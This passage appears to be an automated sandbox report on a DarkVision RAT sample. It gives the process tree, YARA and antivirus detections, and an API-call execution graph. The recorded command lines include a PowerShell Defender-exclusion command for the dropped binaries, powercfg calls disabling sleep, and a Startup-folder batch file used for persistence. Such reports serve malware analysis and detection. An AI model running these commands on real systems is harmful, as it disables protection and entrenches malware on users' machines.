                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1939596081.0000029E75DED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:13
                                                                                                          Start time:01:37:25
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\downloaded_file.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
                                                                                                          Imagebase:0x300000
                                                                                                          File size:515'584 bytes
                                                                                                          MD5 hash:D60C9E070239F8C240AAA6D8832E11EF
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000D.00000003.1947121395.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000003.1947121395.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000D.00000000.1946141643.0000000000332000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000000.1946141643.0000000000332000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000D.00000002.1957167452.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.1957167452.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: ditekSHen
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:14
                                                                                                          Start time:01:37:25
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                                                                                                          Imagebase:0x7ff614bf0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:15
                                                                                                          Start time:01:37:25
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:16
                                                                                                          Start time:01:37:25
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\explorer.exe"
                                                                                                          Imagebase:0x7ff72b770000
                                                                                                          File size:5'141'208 bytes
                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:17
                                                                                                          Start time:01:37:25
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                                                                                                          Imagebase:0x7ff788560000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:18
                                                                                                          Start time:01:37:32
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
                                                                                                          Imagebase:0x7ff72b770000
                                                                                                          File size:5'141'208 bytes
                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:19
                                                                                                          Start time:01:37:34
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
                                                                                                          Imagebase:0x7ff66ccc0000
                                                                                                          File size:2'887'168 bytes
                                                                                                          MD5 hash:56EC5472231866630749CCF6977C4FBD
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000013.00000002.2047760821.0000016DE66D1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000013.00000002.2048053802.0000016DE6950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000013.00000002.2047498175.0000016DE6452000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:20
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:21
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:22
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:23
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:24
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:25
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:26
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:27
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:28
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:explorer.exe
                                                                                                          Imagebase:0x7ff72b770000
                                                                                                          File size:5'141'208 bytes
                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:29
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat" "
                                                                                                          Imagebase:0x7ff614bf0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:30
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:31
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"
                                                                                                          Imagebase:0x7ff66ccc0000
                                                                                                          File size:2'887'168 bytes
                                                                                                          MD5 hash:56EC5472231866630749CCF6977C4FBD
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001F.00000002.2065498416.000001677AB40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001F.00000002.2064926837.000001677A63A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001F.00000002.2065257681.000001677A8C1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:32
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:33
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:34
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:35
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:36
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:37
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:38
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:39
                                                                                                          Start time:01:37:37
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:14.4%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:6.8%
                                                                                                            Total number of Nodes:813
                                                                                                            Total number of Limit Nodes:20
                                                                                                            execution_graph 7544 140001dea 7545 140001ded 7544->7545 7556 140012360 7545->7556 7548 140012360 HeapFree 7549 140001e11 7548->7549 7550 140012360 HeapFree 7549->7550 7551 140001e23 7550->7551 7552 140012360 HeapFree 7551->7552 7553 140001e35 7552->7553 7554 140012360 HeapFree 7553->7554 7555 140001e47 7554->7555 7557 140012371 HeapFree 7556->7557 7558 140001dfc 7556->7558 7557->7558 7558->7548 8326 140011f69 8327 14001202d 8326->8327 8328 140011f89 8326->8328 8328->8327 8329 140011fc4 8328->8329 8332 140011d30 4 API calls 8328->8332 8330 140011feb 8329->8330 8331 140011fcf memmove 8329->8331 8330->8327 8333 140011ffb 8330->8333 8334 14001202f memmove 8330->8334 8331->8330 8332->8329 8333->8327 8335 140016538 5 API calls 8333->8335 8334->8327 8335->8333 7559 1400141eb 7560 1400141f6 7559->7560 7562 14001430c 7560->7562 7563 140014d80 7560->7563 7564 140014dad 7563->7564 7565 140014e0a memmove 7564->7565 7566 140014def memmove 7564->7566 7567 140014dc7 7564->7567 7565->7567 7568 140014e2b memmove 7565->7568 7566->7567 7567->7562 7568->7567 8187 1400016ed 8188 1400016f0 8187->8188 8189 140012360 HeapFree 8188->8189 8190 1400016ff 8189->8190 8191 140011ef4 2 API calls 8190->8191 8192 140001711 8191->8192 8193 140011ef4 2 API calls 8192->8193 8194 140001723 8193->8194 7890 140003c6e 7891 140003c71 7890->7891 7892 140012360 HeapFree 7891->7892 7893 140003c80 7892->7893 7894 140012360 HeapFree 7893->7894 7895 140003c92 7894->7895 7896 140012360 HeapFree 7895->7896 7897 140003ca7 7896->7897 7898 140012360 HeapFree 7897->7898 7899 140003cb9 7898->7899 7900 140017070 7901 1400170f8 7900->7901 7902 140017097 MultiByteToWideChar 7900->7902 7903 1400126d0 2 API calls 7901->7903 7902->7901 7905 1400170c9 7902->7905 7906 140017101 7903->7906 7907 1400126d0 2 API calls 7905->7907 7908 1400170d2 MultiByteToWideChar 7907->7908 7908->7906 7909 140012c70 TlsGetValue HeapFree HeapFree 7910 140010c70 7913 140010c98 7910->7913 7914 140010cd1 7913->7914 7915 140010ceb 7913->7915 7918 140010cd9 7913->7918 7919 1400171f0 7914->7919 7915->7918 7926 140016e50 7915->7926 7932 140010f00 7918->7932 7920 140017216 WideCharToMultiByte 7919->7920 7921 14001729d malloc 7919->7921 7920->7921 7924 14001725a malloc 7920->7924 7922 1400172aa 7921->7922 7922->7918 7924->7921 7925 14001726d WideCharToMultiByte 7924->7925 7925->7922 7927 140016e76 WideCharToMultiByte 7926->7927 7930 140016f02 7926->7930 7929 140016ebe malloc 7927->7929 7927->7930 7929->7930 7931 140016ecf WideCharToMultiByte 7929->7931 7930->7918 7931->7930 7933 140010f1e 7932->7933 7934 1400126d0 2 API calls 7933->7934 7935 140010d5b 7934->7935 8195 140014af0 8197 140014b26 8195->8197 8198 140014b12 8195->8198 8196 140014d80 3 API calls 8196->8197 8198->8196 8198->8197 7397 14000e3f0 7398 14000e4ee 7397->7398 7399 14000e40a 7397->7399 7399->7398 7400 14000e483 7399->7400 7401 14000e41a 7399->7401 7414 14000e770 WideCharToMultiByte 7400->7414 7403 14000e451 7401->7403 7404 14000e425 7401->7404 7403->7403 7405 14000e45d WriteFile 7403->7405 7409 14000e620 5 API calls 7404->7409 7407 14000e4c5 WriteFile 7411 14000e4dc HeapFree 7407->7411 7408 14000e4b7 7419 14000e620 7408->7419 7412 14000e445 7409->7412 7411->7398 7413 14000e4bf 7413->7411 7415 14000e7b9 HeapAlloc 7414->7415 7416 14000e4a0 7414->7416 7417 14000e804 7415->7417 7418 14000e7d8 WideCharToMultiByte 7415->7418 7416->7398 7416->7407 7416->7408 7417->7416 7418->7417 7420 14000e644 7419->7420 7421 14000e75e 7419->7421 7422 14000e673 7420->7422 7423 14000e64a SetFilePointer 7420->7423 7421->7413 7424 14000e67e 7422->7424 7425 14000e6ff 7422->7425 7423->7422 7426 14000e6b7 7424->7426 7429 14000e699 memmove 7424->7429 7432 14000ddc0 7425->7432 7426->7413 7428 14000e707 7430 14000e711 WriteFile 7428->7430 7431 14000e739 memmove 7428->7431 7429->7413 7430->7413 7431->7413 7433 14000de04 7432->7433 7434 14000ddd4 WriteFile 7432->7434 7433->7428 7434->7428 7569 14000e1f0 7570 1400112a8 5 API calls 7569->7570 7571 14000e21b 7570->7571 7572 14000e227 CreateFileW 7571->7572 7573 14000e27f 7571->7573 7572->7573 7574 14000e25c 7572->7574 7574->7573 7575 14000e267 HeapAlloc 7574->7575 7575->7573 7580 1400113f8 EnterCriticalSection 7581 140011423 LeaveCriticalSection 7580->7581 7936 140016c77 7937 140016c89 TlsFree 7936->7937 7938 140016cbf 7936->7938 7940 140016c97 7937->7940 7939 140016cab DeleteCriticalSection 7939->7938 7940->7939 8199 14000d8f8 8200 14000d908 8199->8200 8201 14000d90d 8199->8201 8203 140011a50 8200->8203 8204 140011a81 8203->8204 8205 140011a60 8203->8205 8204->8201 8209 140011c48 EnterCriticalSection 8205->8209 8207 140011a65 8207->8204 8210 140011bdc 8207->8210 8209->8207 8211 140011be7 8210->8211 8212 140011c3c 8211->8212 8213 140011c32 LeaveCriticalSection 8211->8213 8212->8207 8213->8212 7393 140010ffc 7394 140011009 7393->7394 7395 14001101f 7393->7395 7394->7395 7396 140011013 TlsFree 7394->7396 7396->7395 8336 140010b7c 8337 140010b85 memset 8336->8337 8338 140010b8d 8336->8338 8337->8338 8339 14000477e 8340 140012360 HeapFree 8339->8340 8341 140004790 8340->8341 8342 140012360 HeapFree 8341->8342 8343 1400047a2 8342->8343 8344 140012360 HeapFree 8343->8344 8345 1400047b4 8344->8345 8346 140012360 HeapFree 8345->8346 8347 1400047c6 8346->8347 8348 140012360 HeapFree 8347->8348 8349 1400047d8 8348->8349 7435 140001000 7436 14000101d 7435->7436 7487 140012060 HeapCreate TlsAlloc 7436->7487 7438 14000105b 7490 14000de20 7438->7490 7440 140001065 7493 14000c980 HeapCreate 7440->7493 7442 140001074 7494 14000c07c 7442->7494 7444 140001079 7445 14000b538 memset InitCommonControlsEx CoInitialize 7444->7445 7446 14000107e 7445->7446 7447 140007160 InitializeCriticalSection 7446->7447 7448 140001083 7447->7448 7449 1400120d0 HeapAlloc HeapReAlloc HeapFree 7448->7449 7450 1400010a3 7449->7450 7451 14000ccd8 32 API calls 7450->7451 7452 1400010e6 7451->7452 7453 14000d524 16 API calls 7452->7453 7454 1400010fa 7453->7454 7455 14000d444 11 API calls 7454->7455 7456 14000111e 7455->7456 7457 14000d524 16 API calls 7456->7457 7458 14000112a 7457->7458 7459 14000d444 11 API calls 7458->7459 7460 14000114e 7459->7460 7461 140011d30 HeapAlloc memset HeapFree HeapFree 7460->7461 7462 140001185 7461->7462 7463 1400120d0 HeapAlloc HeapReAlloc HeapFree 7462->7463 7464 1400011a6 7463->7464 7465 14000d524 16 API calls 7464->7465 7466 1400011b2 7465->7466 7467 14000d444 11 API calls 7466->7467 7468 1400011d6 7467->7468 7469 14000c4d0 RemoveVectoredExceptionHandler AddVectoredExceptionHandler 7468->7469 7470 1400011e5 7469->7470 7471 1400121c0 GetLastError TlsGetValue SetLastError 7470->7471 7472 1400011ef 7471->7472 7473 1400121c0 GetLastError TlsGetValue SetLastError 7472->7473 7474 1400011ff 7473->7474 7475 140004211 31 API calls 7474->7475 7476 14000120e 7475->7476 7477 140012210 TlsGetValue HeapAlloc HeapReAlloc 7476->7477 7478 14000121f 7477->7478 7479 1400021ea 50 API calls 7478->7479 7480 140001224 7479->7480 7481 140001236 7480->7481 7482 14000433f 188 API calls 7480->7482 7483 14000593c 232 API calls 7481->7483 7482->7481 7484 14000123b 7483->7484 7485 1400120a0 HeapDestroy TlsFree 7484->7485 7486 140001245 HeapDestroy ExitProcess 7485->7486 7499 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7487->7499 7489 14001208c 7489->7438 7500 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 7490->7500 7492 14000de38 7492->7440 7493->7442 7501 1400110dc 7494->7501 7498 14000c0a8 InitializeCriticalSection 7499->7489 7500->7492 7502 1400110fd 7501->7502 7503 140011112 TlsAlloc HeapAlloc TlsSetValue 7502->7503 7504 140011149 TlsGetValue HeapReAlloc TlsSetValue 7502->7504 7503->7504 7505 140011198 7504->7505 7506 14000c08d 7505->7506 7509 140011cb0 HeapAlloc 7505->7509 7508 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 7506->7508 7508->7498 7510 140011cd3 7509->7510 7510->7506 7583 140007a00 